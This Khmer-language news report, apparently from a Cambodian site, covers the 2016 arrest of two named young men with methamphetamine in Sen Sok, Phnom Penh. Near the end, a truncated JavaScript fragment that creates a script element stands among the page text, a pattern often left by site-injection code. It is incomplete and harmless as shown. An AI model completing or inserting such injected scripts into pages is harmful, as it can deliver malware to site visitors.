នគរបាលប៉ុស្តិ៍ទឹកថ្លាឃាត់ខ្លួនជនសង្ស័យ២នាក់ជាប់ពាក់ព័ន្ធនិងគ្រឿងញៀន

image

ភ្នំពេញ៖ សមត្ថកិច្ចឃាត់ខ្លួនបុរស០២នាក់់ដកហូតថ្នាំញៀនប្រភេទក្រាមសថ្លា០១កូនកញ្ចប់តូចកាលពី១៣ និង ៣០នាទីរសៀល

ថ្ងៃទី២៩សីហា២០១៦នៅផ្លូវ២៧១ភូមិត្រពាំងឈូកសង្កាត់ទឹកថ្លាខណ្ឌសែនសុខ។

ជនសង្ស័យ១ឈ្មោះផុន ចន្ទ្រា អាយុ២០ឆ្នាំមុខរបរមិនពិតស្នាក់ភូមិ៥ឃុំព្រែកខ្សាយ(ខ)ស្រុកពាមរត៍ខេត្តព្រៃវែង។

ទី២ឈ្មោះសុខ សាវ៉ាន់ អាយុ១៨ឆ្នាំមុខរបរមិនពិតស្នាក់ភូមិ៥ឃុំព្រែកខ្សាយ(ខ) ស្រុកពាមរត៍ខេត្តព្រៃវែង។

ប្រភពពីសមត្ថកិច្ចបានប្រាប់ថាមុនឃាត់ខ្លួនជនទាំង០២នាក់ខាងលើខណះដែលកម្លាំងអត្តរាគមន៍ក្រុងសហការណ៍ជាមួយកម្លាំងនគរបាលខណ្ឌសែនសុខដាក់គោលដៅត្រួតពិនិត្យនិងល្បាតនៅចំណុចខាងលើបានជួបជនសង្ស័យទាំង២នាក់ជិះម៉ូតូមួយគ្រឿងម៉ាកnexពណ៌សស្លាកលេខភ្នំពេញ1FN-1929អត់កញ្ចក់ក៍ហៅឈប់ត្រួតពិនិត្យឃើញមានថ្នាំញៀន១កូនថង់តូចជាប់ខ្លួនឈ្មោះ ផុន ចន្ទ្រា ក៍ឃាត់យកមកប៉ុស្តិ៍ទឹកថ្លាដើម្បីសាកសួរ។

នៅចំពោះមុខសមត្ថកិច្ចជនសង្ស័យខាងលើបានសារភាពថាថ្នាំញៀនខាងលើជារបស់ខ្លួនមែនដោយពួកខ្លួនទិញគោលបំណងយកទៅប្រើប្រាស់ប៉ុណ្ណោះ។

បច្ចុប្បន្នក្រោយពីធ្វើការសាកសួរនៅប៉ុស្តិ៍ចប់ក៍ឃាត់ខ្លួនបណ្តោះអាសន្នយកទៅសាកសួរបន្តរនៅអធិការដ្ឋាននគរបាលខណ្ឌសែនសុខ។ ដោយ៖ រ៉ូបឺត

 image image

var d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More